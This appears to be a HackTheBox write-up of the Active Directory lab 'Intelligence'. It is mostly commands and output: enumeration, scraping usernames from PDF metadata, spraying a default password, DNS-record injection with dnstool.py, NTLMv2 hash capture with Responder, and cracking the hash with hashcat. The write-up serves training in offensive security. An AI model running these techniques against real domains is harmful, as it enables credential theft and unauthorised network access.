# Intelligence ## Nmap Scan ``` $ nmap -sC -sV -Pn -oN nmap 10.10.10.248 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 02:19 EDT Nmap scan report for 10.10.10.248 Host is up (0.011s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Intelligence | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-27 13:13:31Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.intelligence.htb | Not valid before: 2024-05-27T12:24:52 |_Not valid after: 2025-05-27T12:24:52 |_ssl-date: 2024-05-27T13:14:50+00:00; +6h54m19s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-05-27T13:14:51+00:00; +6h54m19s from scanner time. | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.intelligence.htb | Not valid before: 2024-05-27T12:24:52 |_Not valid after: 2025-05-27T12:24:52 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-05-27T13:14:50+00:00; +6h54m19s from scanner time. | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.intelligence.htb | Not valid before: 2024-05-27T12:24:52 |_Not valid after: 2025-05-27T12:24:52 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.intelligence.htb | Not valid before: 2024-05-27T12:24:52 |_Not valid after: 2025-05-27T12:24:52 |_ssl-date: 2024-05-27T13:14:51+00:00; +6h54m19s from scanner time. Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 6h54m18s, deviation: 0s, median: 6h54m18s | smb2-time: | date: 2024-05-27T13:14:11 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 91.52 seconds ``` ``` $ sudo nmap -sU -Pn -oN udp-nmap 10.10.10.248 [sudo] password for kali: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 03:39 EDT Nmap scan report for intelligence.htb (10.10.10.248) Host is up (0.0066s latency). Not shown: 997 open|filtered udp ports (no-response) PORT STATE SERVICE 53/udp open domain 88/udp open kerberos-sec 123/udp open ntp ``` ## Initial Access ### enum4linux #### Anonymous ``` $ enum4linux -a 10.10.10.248 Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 27 02:27:40 2024 =========================================( Target Information )========================================= Target ........... 10.10.10.248 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ============================( Enumerating Workgroup/Domain on 10.10.10.248 )============================ [E] Can't find workgroup/domain ================================( Nbtstat Information for 10.10.10.248 )================================ Looking up status of 10.10.10.248 No reply from 10.10.10.248 ===================================( Session Check on 10.10.10.248 )=================================== [+] Server 10.10.10.248 allows sessions using username '', password '' ================================( Getting domain SID for 10.10.10.248 )================================ Domain Name: intelligence Domain Sid: S-1-5-21-4210132550-3389855604-3437519686 [+] Host is part of a domain (not a workgroup) ===================================( OS information on 10.10.10.248 )=================================== [E] Can't get OS info with smbclient [+] Got OS info for 10.10.10.248 from srvinfo: do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED =======================================( Users on 10.10.10.248 )======================================= [E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED [E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED =================================( Share Enumeration on 10.10.10.248 )================================= do_connect: Connection to 10.10.10.248 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. Unable to connect with SMB1 -- no workgroup available [+] Attempting to map shares on 10.10.10.248 ============================( Password Policy Information for 10.10.10.248 )============================ [E] Unexpected error from polenum: [+] Attaching to 10.10.10.248 using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:10.10.10.248) [+] Trying protocol 445/SMB... [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. [E] Failed to get password policy with rpcclient =======================================( Groups on 10.10.10.248 )======================================= [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ==================( Users on 10.10.10.248 via RID cycling (RIDS: 500-550,1000-1050) )================== [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. ===============================( Getting printer info for 10.10.10.248 )=============================== do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED enum4linux complete on Mon May 27 02:28:03 2024 ``` #### Guest ``` $ enum4linux -a -u 'guest' -p '' 10.10.10.248 Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 27 02:28:24 2024 =========================================( Target Information )========================================= Target ........... 10.10.10.248 RID Range ........ 500-550,1000-1050 Username ......... 'guest' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ============================( Enumerating Workgroup/Domain on 10.10.10.248 )============================ [E] Can't find workgroup/domain ================================( Nbtstat Information for 10.10.10.248 )================================ Looking up status of 10.10.10.248 No reply from 10.10.10.248 ===================================( Session Check on 10.10.10.248 )=================================== [E] Server doesn't allow session using username 'guest', password ''. Aborting remainder of tests. ``` ### Port 80 #### Directory Enumeration ``` $ gobuster dir -u http://10.10.10.248/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o intelligence/gobuster -x txt,pdf,config -b 404 -k =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.248/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: txt,pdf,config [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /documents (Status: 301) [Size: 153] [--> http://10.10.10.248/documents/] /Documents (Status: 301) [Size: 153] [--> http://10.10.10.248/Documents/] Progress: 882240 / 882244 (100.00%) =============================================================== Finished =============================================================== ``` ``` $ gobuster dir -u http://10.10.10.248/documents/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o intelligence/gobuster -x txt,pdf,config -b 404 -k =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.248/documents/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: txt,pdf,config [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== Progress: 882240 / 882244 (100.00%) =============================================================== Finished =============================================================== ``` If I took a look at the documents naming convention, I can see that they used this format: `--
-upload.pdf`
{% embed url="" %} So I used this python script to generate the dates first ``` $ python3 date_generator.py 2020 2021 0 "-" > wordlist.txt ``` Then next, I appended `-upload.pdf` to each of the line to create the finalised wordlist. ``` $ cat wordlist.txt | while read line; do echo ${line}-upload.pdf; done > finalised_wordlist.txt ``` So the final wordlist will look like this: ``` 2020-01-01-upload.pdf .... 2020-12-31-upload.pdf ``` So when we run gobuster with that wordlist again, it will give this: ``` $ gobuster dir -u http://10.10.10.248/Documents/ -w finalised_wordlist.txt -b 404 -k =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.248/Documents/ [+] Method: GET [+] Threads: 10 [+] Wordlist: finalised_wordlist.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /2020-01-02-upload.pdf (Status: 200) [Size: 27002] /2020-01-10-upload.pdf (Status: 200) [Size: 26400] /2020-01-01-upload.pdf (Status: 200) [Size: 26835] /2020-01-04-upload.pdf (Status: 200) [Size: 27522] /2020-01-20-upload.pdf (Status: 200) [Size: 11632] /2020-01-22-upload.pdf (Status: 200) [Size: 28637] /2020-01-23-upload.pdf (Status: 200) [Size: 11557] /2020-01-30-upload.pdf (Status: 200) [Size: 26706] /2020-01-25-upload.pdf (Status: 200) [Size: 26252] /2020-02-11-upload.pdf (Status: 200) [Size: 25245] /2020-02-17-upload.pdf (Status: 200) [Size: 11228] /2020-02-23-upload.pdf (Status: 200) [Size: 27378] /2020-02-28-upload.pdf (Status: 200) [Size: 11543] /2020-02-24-upload.pdf (Status: 200) [Size: 27332] /2020-03-04-upload.pdf (Status: 200) [Size: 26194] /2020-03-05-upload.pdf (Status: 200) [Size: 26124] /2020-03-12-upload.pdf (Status: 200) [Size: 27143] /2020-03-13-upload.pdf (Status: 200) [Size: 24888] /2020-03-21-upload.pdf (Status: 200) [Size: 11250] /2020-03-17-upload.pdf (Status: 200) [Size: 27227] /2020-04-02-upload.pdf (Status: 200) [Size: 11466] /2020-04-04-upload.pdf (Status: 200) [Size: 27949] /2020-04-15-upload.pdf (Status: 200) [Size: 26689] /2020-04-23-upload.pdf (Status: 200) [Size: 24865] /2020-05-01-upload.pdf (Status: 200) [Size: 28228] /2020-05-07-upload.pdf (Status: 200) [Size: 26062] /2020-05-11-upload.pdf (Status: 200) [Size: 27244] /2020-05-03-upload.pdf (Status: 200) [Size: 26093] /2020-05-17-upload.pdf (Status: 200) [Size: 26448] /2020-05-21-upload.pdf (Status: 200) [Size: 26255] /2020-05-24-upload.pdf (Status: 200) [Size: 11857] /2020-05-20-upload.pdf (Status: 200) [Size: 27480] /2020-05-29-upload.pdf (Status: 200) [Size: 11532] /2020-06-03-upload.pdf (Status: 200) [Size: 11381] /2020-06-02-upload.pdf (Status: 200) [Size: 27797] /2020-06-04-upload.pdf (Status: 200) [Size: 26922] /2020-06-07-upload.pdf (Status: 200) [Size: 27937] /2020-06-08-upload.pdf (Status: 200) [Size: 11540] /2020-06-12-upload.pdf (Status: 200) [Size: 11575] /2020-06-14-upload.pdf (Status: 200) [Size: 26443] /2020-06-15-upload.pdf (Status: 200) [Size: 27121] /2020-06-21-upload.pdf (Status: 200) [Size: 26060] /2020-06-22-upload.pdf (Status: 200) [Size: 26278] /2020-06-25-upload.pdf (Status: 200) [Size: 10662] /2020-06-26-upload.pdf (Status: 200) [Size: 27338] /2020-06-28-upload.pdf (Status: 200) [Size: 26390] /2020-06-30-upload.pdf (Status: 200) [Size: 25634] /2020-07-02-upload.pdf (Status: 200) [Size: 27320] /2020-07-06-upload.pdf (Status: 200) [Size: 24966] /2020-07-08-upload.pdf (Status: 200) [Size: 11910] /2020-07-20-upload.pdf (Status: 200) [Size: 12100] /2020-07-24-upload.pdf (Status: 200) [Size: 26321] /2020-08-01-upload.pdf (Status: 200) [Size: 27038] /2020-08-03-upload.pdf (Status: 200) [Size: 25405] /2020-08-09-upload.pdf (Status: 200) [Size: 11611] /2020-08-20-upload.pdf (Status: 200) [Size: 10711] /2020-08-19-upload.pdf (Status: 200) [Size: 26885] /2020-09-04-upload.pdf (Status: 200) [Size: 26986] /2020-09-05-upload.pdf (Status: 200) [Size: 26417] /2020-09-06-upload.pdf (Status: 200) [Size: 25551] /2020-09-02-upload.pdf (Status: 200) [Size: 27148] /2020-09-11-upload.pdf (Status: 200) [Size: 12098] /2020-09-13-upload.pdf (Status: 200) [Size: 26521] /2020-09-16-upload.pdf (Status: 200) [Size: 26959] /2020-09-22-upload.pdf (Status: 200) [Size: 25072] /2020-09-27-upload.pdf (Status: 200) [Size: 26809] /2020-09-30-upload.pdf (Status: 200) [Size: 26080] /2020-09-29-upload.pdf (Status: 200) [Size: 24586] /2020-10-05-upload.pdf (Status: 200) [Size: 11248] /2020-10-19-upload.pdf (Status: 200) [Size: 27196] /2020-11-01-upload.pdf (Status: 200) [Size: 26599] /2020-11-03-upload.pdf (Status: 200) [Size: 25568] /2020-11-06-upload.pdf (Status: 200) [Size: 25964] /2020-11-11-upload.pdf (Status: 200) [Size: 26461] /2020-11-13-upload.pdf (Status: 200) [Size: 11074] /2020-11-10-upload.pdf (Status: 200) [Size: 25472] /2020-11-24-upload.pdf (Status: 200) [Size: 11412] /2020-11-30-upload.pdf (Status: 200) [Size: 27286] /2020-12-10-upload.pdf (Status: 200) [Size: 26762] /2020-12-15-upload.pdf (Status: 200) [Size: 27242] /2020-12-20-upload.pdf (Status: 200) [Size: 11902] /2020-12-24-upload.pdf (Status: 200) [Size: 26825] /2020-12-28-upload.pdf (Status: 200) [Size: 11480] Progress: 366 / 367 (99.73%) /2020-12-30-upload.pdf (Status: 200) [Size: 25109] =============================================================== Finished =============================================================== ``` So i copied out the necessary information: ``` /2020-01-02-upload.pdf (Status: 200) [Size: 27002] /2020-01-10-upload.pdf (Status: 200) [Size: 26400] /2020-01-01-upload.pdf (Status: 200) [Size: 26835] /2020-01-04-upload.pdf (Status: 200) [Size: 27522] /2020-01-20-upload.pdf (Status: 200) [Size: 11632] /2020-01-22-upload.pdf (Status: 200) [Size: 28637] /2020-01-23-upload.pdf (Status: 200) [Size: 11557] /2020-01-30-upload.pdf (Status: 200) [Size: 26706] /2020-01-25-upload.pdf (Status: 200) [Size: 26252] /2020-02-11-upload.pdf (Status: 200) [Size: 25245] /2020-02-17-upload.pdf (Status: 200) [Size: 11228] ... /2020-12-20-upload.pdf (Status: 200) [Size: 11902] /2020-12-24-upload.pdf (Status: 200) [Size: 26825] /2020-12-28-upload.pdf (Status: 200) [Size: 11480] /2020-12-30-upload.pdf (Status: 200) [Size: 25109] ``` I used this python script to craft the script to download all the files from the server. ```python file1 = open('curlrequest', 'r') file2 = open('curlrequest.sh', 'w') Lines = file1.readlines() for line in Lines: line = line[:-28] line = "curl -O http://10.10.10.248/documents" + line + "\n" file2.write(line) ``` After running the script we can see some interesting documents. 2020-12-30 - IT Internal Update 2020-06-04 - New Account Guide
So the default password is `NewIntelligenceCorpUser9876`. However, we do not know the username. So the next step is to see if we can find anything in the metadata If I use `exiftool`, i can see who is the `Creator`.
I can create another python script to craft a bash script to get all the `Creator` information. ```python file1 = open('curlrequest', 'r') file2 = open('getusernames.sh', 'w') Lines = file1.readlines() for line in Lines: line = line[:-28] line = line[1:] line = "exiftool " + line + " | grep Creator | cut -c 35-\n" file2.write(line) ``` After running the python script to get the bash script, I can run the bash script to get all the `Creator` information. However, it might not be unique. So I modified the command to be this, so that it will be unique and pipe into a output file. ```bash ./getusernames.sh | uniq -u > usernames.txt ``` After running `crackmapexec` to see what is the username that has the default credentials, there is 1 user that did not change the password: `Tiffany.Molina`. ``` $ sudo crackmapexec smb 10.10.10.248 -u usernames.txt -p 'NewIntelligenceCorpUser9876' SMB 10.10.10.248 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False) SMB 10.10.10.248 445 DC [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 ``` So I tried to see what shares the user can access, the user can read the `User` and `IT` share folder. ``` $ smbmap -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -H 10.10.10.248 ________ ___ ___ _______ ___ ___ __ _______ /" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\ (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) \___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/ __/ \ |: \. |(| _ \ |: \. | // __' \ (| / /" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \ (_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______) ----------------------------------------------------------------------------- SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com https://github.com/ShawnDEvans/smbmap [*] Detected 1 hosts serving SMB [*] Established 1 SMB session(s) [+] IP: 10.10.10.248:445 Name: 10.10.10.248 Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC IT READ ONLY NETLOGON READ ONLY Logon server share SYSVOL READ ONLY Logon server share Users READ ONLY ``` So I accessed the `User` share to get the user flag.
## Privilege Escalation In the `IT` share folder, there is this file `downdetector.ps1`.
When I look at the content of the file, I can see that they get the record from the server with anything that has `web*`. ```powershell # Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") { try { $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From 'Ted Graves ' -To 'Ted Graves ' -Subject "Host: $($record.Name) is down" } } catch {} } ``` So the next step is to inject our own DNS record into the server. {% embed url="" %} I will then inject the record into the server using `dnstool.py`. ``` $ python dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.10.10.248 -a add -r web1 -d 10.10.14.4 -t A [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully ``` After running responder, I can see this. {% code overflow="wrap" %} ``` [HTTP] NTLMv2 Client : 10.10.10.248 [HTTP] NTLMv2 Username : intelligence\Ted.Graves [HTTP] NTLMv2 Hash : Ted.Graves::intelligence:5051667202be3c02:DBE9D36AB87B5F83565261F4C7564315:0101000000000000BAA7AA2CF9B0DA01B11CF5A3E8716936000000000200080057004A003400450001001E00570049004E002D005400480038003600510032004800560045005A0038000400140057004A00340045002E004C004F00430041004C0003003400570049004E002D005400480038003600510032004800560045005A0038002E0057004A00340045002E004C004F00430041004C000500140057004A00340045002E004C004F00430041004C0008003000300000000000000000000000002000005F575D3E654A9F41EA39F1BE11B2D988E1C78D5F6E16F768960BF8DE927286760A001000000000000000000000000000000000000900340048005400540050002F0077006500620031002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000 ``` {% endcode %} The next step is to try to crack the hash and we got the password from the user which is `Mr.Teddy`. {% code overflow="wrap" %} ``` $ echo 'Ted.Graves::intelligence:5051667202be3c02:DBE9D36AB87B5F83565261F4C7564315:0101000000000000BAA7AA2CF9B0DA01B11CF5A3E8716936000000000200080057004A003400450001001E00570049004E002D005400480038003600510032004800560045005A0038000400140057004A00340045002E004C004F00430041004C0003003400570049004E002D005400480038003600510032004800560045005A0038002E0057004A00340045002E004C004F00430041004C000500140057004A00340045002E004C004F00430041004C0008003000300000000000000000000000002000005F575D3E654A9F41EA39F1BE11B2D988E1C78D5F6E16F768960BF8DE927286760A001000000000000000000000000000000000000900340048005400540050002F0077006500620031002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000' > hash ┌──(ranay㉿kali)-[~/Desktop/hackthebox/boxes/intelligence] └─$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force hashcat (v6.2.6) starting ... TED.GRAVES::intelligence:5051667202be3c02:dbe9d36ab87b5f83565261f4c7564315:0101000000000000baa7aa2cf9b0da01b11cf5a3e8716936000000000200080057004a003400450001001e00570049004e002d005400480038003600510032004800560045005a0038000400140057004a00340045002e004c004f00430041004c0003003400570049004e002d005400480038003600510032004800560045005a0038002e0057004a00340045002e004c004f00430041004c000500140057004a00340045002e004c004f00430041004c0008003000300000000000000000000000002000005f575d3e654a9f41ea39f1be11b2d988e1c78d5f6e16f768960bf8de927286760a001000000000000000000000000000000000000900340048005400540050002f0077006500620031002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy ... ``` {% endcode %} ### ReadGMSAPassword Using bloodhound, I can see that `Ted.Graves` is a member of `ITSUPPORT` group which is able to `READGMSAPassword` of the user `SVC_INT`.
